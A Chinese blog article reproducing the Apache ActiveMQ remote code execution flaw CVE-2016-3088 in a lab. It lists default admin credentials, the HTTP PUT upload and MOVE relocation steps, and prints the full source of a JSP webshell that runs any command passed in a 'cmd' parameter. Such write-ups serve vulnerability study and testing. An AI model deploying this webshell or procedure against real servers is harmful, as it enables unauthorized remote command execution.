ActiveMQ远程代码执行漏洞CVE-2016-3088是怎么复现的

发布时间:2021-12-29 17:43:53 作者:柒染
来源:亿速云 阅读:288

本篇文章给大家分享的是有关ActiveMQ远程代码执行漏洞CVE-2016-3088是怎么复现的,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。

ActiveMQ 是 Apache 软件基金会下的一个消息驱动中间件软件。Jetty 是一个 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 运行环境。ActiveMQ 5.0 及以后版本默认集成了jetty。在启动后一个监控 ActiveMQ 的 Web 应用。

下面仅作漏洞复现记录与实现,利用流程如下:

1.漏洞环境

链接:http://192.168.101.152:8161

ActiveMQ远程代码执行漏洞CVE-2016-3088是怎么复现的

2.利用

访问链接: http://192.168.101.152:8161/admin/test/systemProperties.jsp

默认账户密码为:admin/admin

得到真实路径

ActiveMQ远程代码执行漏洞CVE-2016-3088是怎么复现的

使用PUT方法上传小马至/fileserver/目录下

ActiveMQ远程代码执行漏洞CVE-2016-3088是怎么复现的

<%@ page import="java.io.*" %>
<%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%>

访问目标,没有解析

ActiveMQ远程代码执行漏洞CVE-2016-3088是怎么复现的

使用MOVE方法将其转移至api或admin目录下

Destination: file:///opt/activemq/webapps/api/q.jsp

ActiveMQ远程代码执行漏洞CVE-2016-3088是怎么复现的

上传成功后访问,执行

ActiveMQ远程代码执行漏洞CVE-2016-3088是怎么复现的

执行成功

以上就是ActiveMQ远程代码执行漏洞CVE-2016-3088是怎么复现的,小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注亿速云行业资讯频道。

推荐阅读:
  1. Apache ActiveMQ 远程代码执行漏洞 (CVE-
  2. ThinkPHP远程命令执行漏洞原理及复现

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

activemq cve-2016-3088

上一篇:web安全中Adobe ColdFusion文件读取漏洞CVE-2010-2861的示例分析

下一篇:如何进行couchdb 任意命令执行漏洞CVE-2017-12636复现

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》